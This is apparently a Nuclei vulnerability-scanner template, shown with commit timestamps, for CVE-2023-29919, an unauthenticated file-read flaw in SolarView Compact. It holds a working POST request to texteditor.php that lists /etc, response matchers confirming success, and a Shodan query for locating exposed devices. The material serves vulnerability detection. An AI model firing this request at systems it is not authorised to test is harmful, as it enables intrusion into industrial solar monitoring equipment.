2023-05-19 11:50:08 +00:00
id : CVE-2023-29919
info :
name : SolarView Compact <= 6.00 - Local File Inclusion
author : For3stCo1d
severity : high
description : |
There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
reference :
- https://github.com/xiaosed/CVE-2023-29919
- https://nvd.nist.gov/vuln/detail/CVE-2023-29919
2023-05-19 14:31:16 +00:00
classification :
cve-id : CVE-2023-29919
2023-05-19 11:50:08 +00:00
metadata :
2023-05-19 14:31:16 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-05-19 11:50:08 +00:00
shodan-query : http.html:"SolarView Compact"
tags : cve,cve2023,lfi,solarview,edb
http :
- raw :
- |
POST /texteditor.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'action="texteditor.php"'
2023-05-19 17:53:25 +00:00
- 'adduser.conf'
2023-05-19 11:50:08 +00:00
- 'deluser.conf'
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200